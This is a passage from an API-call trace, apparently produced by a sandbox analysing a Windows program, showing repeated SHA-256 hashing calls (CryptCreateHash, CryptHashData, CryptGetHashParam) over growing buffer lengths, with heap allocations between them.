dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.693] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0186.693] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.693] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e852f0 [0186.693] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e852f0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e852f0, pdwDataLen=0xcdf6c) returned 1 [0186.693] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.693] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.693] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0186.693] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.693] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0186.693] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.693] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85920 [0186.693] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e85920, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85920, pdwDataLen=0xcdf6c) returned 1 [0186.693] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.693] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0186.693] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.694] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.694] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0186.694] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.694] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85980 [0186.694] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32e85980, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85980, pdwDataLen=0xcdf6c) returned 1 [0186.694] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0186.694] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.694] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0186.695] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.695] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0186.695] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.695] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e859b0 [0186.695] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e859b0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e859b0, pdwDataLen=0xcdf6c) returned 1 [0186.695] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0186.695] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0186.695] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338222d0) returned 1 [0186.695] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.695] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0186.695] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.695] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85e00 [0186.695] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x2, pbData=0x32e85e00, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85e00, pdwDataLen=0xcdf6c) returned 1 [0186.695] CryptDestroyHash (hHash=0x3396f740) returned 1 [0186.696] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0186.696] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0186.696] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.696] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0186.696] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.696] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85a40 [0186.696] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e85a40, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85a40, pdwDataLen=0xcdf6c) returned 1 [0186.696] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.696] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0186.696] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0186.697] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.697] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0186.697] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.697] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e855c0 [0186.697] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e855c0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e855c0, pdwDataLen=0xcdf6c) returned 1 [0186.697] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.697] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0186.697] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0186.698] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.698] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0186.698] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.698] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85d70 [0186.698] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32e85d70, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85d70, pdwDataLen=0xcdf6c) returned 1 [0186.698] CryptDestroyHash (hHash=0x3396f890) returned 1 [0186.698] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0186.698] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.701] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.701] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0186.701] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.701] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85d40 [0186.701] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32e85d40, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85d40, pdwDataLen=0xcdf6c) returned 1 [0186.701] CryptDestroyHash (hHash=0x3396f200) returned 1 [0186.701] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.701] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0186.701] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.701] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0186.701] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.701] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e856b0 [0186.701] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e856b0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e856b0, pdwDataLen=0xcdf6c) returned 1 [0186.701] CryptDestroyHash (hHash=0x3396f660) returned 1 [0186.701] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0186.702] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.702] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.702] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0186.702] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.702] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85a70 [0186.702] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e85a70, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85a70, pdwDataLen=0xcdf6c) returned 1 [0186.702] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0186.702] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.702] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821fd0) returned 1 [0186.703] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.703] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0186.703] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.703] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85b60 [0186.703] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e85b60, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85b60, pdwDataLen=0xcdf6c) returned 1 [0186.703] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.703] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0186.703] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0186.703] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.704] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0186.704] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.704] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e854a0 [0186.704] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e854a0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e854a0, pdwDataLen=0xcdf6c) returned 1 [0186.704] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.704] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0186.704] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0186.704] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.704] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0186.704] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.704] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e854d0 [0186.704] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e854d0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e854d0, pdwDataLen=0xcdf6c) returned 1 [0186.704] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.704] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0186.704] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338223d0) returned 1 [0186.705] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.705] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0186.705] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.705] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85b90 [0186.705] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e85b90, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85b90, pdwDataLen=0xcdf6c) returned 1 [0186.705] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.705] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0186.705] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.706] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.706] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0186.706] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.706] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85dd0 [0186.706] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e85dd0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85dd0, pdwDataLen=0xcdf6c) returned 1 [0186.706] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.706] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.706] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0186.706] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.706] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0186.707] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.707] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85500 [0186.707] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e85500, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85500, pdwDataLen=0xcdf6c) returned 1 [0186.707] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0186.707] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0186.707] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0186.707] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.707] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0186.707] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.707] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85560 [0186.707] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e85560, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85560, pdwDataLen=0xcdf6c) returned 1 [0186.707] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.707] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0186.707] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0186.708] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.708] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0186.708] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.708] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e855f0 [0186.708] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e855f0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e855f0, pdwDataLen=0xcdf6c) returned 1 [0186.708] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.708] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0186.708] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0186.709] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.709] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0186.709] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.709] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85f20 [0186.709] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e85f20, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85f20, pdwDataLen=0xcdf6c) returned 1 [0186.709] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.709] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0186.709] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.709] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.709] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0186.710] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.710] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86010 [0186.710] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e86010, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e86010, pdwDataLen=0xcdf6c) returned 1 [0186.710] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.710] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.710] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0186.710] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.710] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0186.710] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.710] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86820 [0186.711] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0186.711] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0186.711] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0186.711] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.711] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0186.711] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e861c0 [0186.711] CryptDestroyHash (hHash=0x3396f200) returned 1 [0186.711] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0186.711] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0186.712] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.712] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0186.712] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86850 [0186.712] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0186.712] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0186.712] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0186.713] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.713] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0186.713] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86490 [0186.713] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0186.713] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0186.713] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32348160 | out: hHeap=0x2150000) returned 1 [0186.713] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32348160 [0186.713] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338226d0) returned 1 [0186.714] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.714] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x20, dwFlags=0x0) returned 1 [0186.714] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86790 [0186.714] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.714] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0186.714] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338222d0) returned 1 [0186.717] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.717] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x40, dwFlags=0x0) returned 1 [0186.717] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e861f0 [0186.717] CryptDestroyHash (hHash=0x3396f890) returned 1 [0186.717] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 